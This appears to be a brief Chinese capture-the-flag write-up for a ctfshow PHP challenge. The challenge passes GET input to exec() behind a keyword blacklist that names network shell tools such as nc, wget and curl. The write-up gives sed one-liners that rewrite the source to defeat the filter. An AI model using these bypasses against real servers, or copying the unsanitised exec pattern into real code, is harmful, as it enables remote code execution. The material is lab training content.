function check($x){
if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
die('too young too simple sometimes naive!');
}
}
if(isset($_GET['c'])){
$c=$_GET['c'];
check($c);
exec($c);
}预期解就是通过:命令执行-->写文件-->访问文件。
这里说一下群主的“骚”姿:
ls |xargs sed -i 's/die/echo/'
ls |xargs sed -i 's/exec/system/'标签:sed,无回显,源码,ls,rce,php,ctfshow From: https://www.cnblogs.com/meng-han/p/16809749.html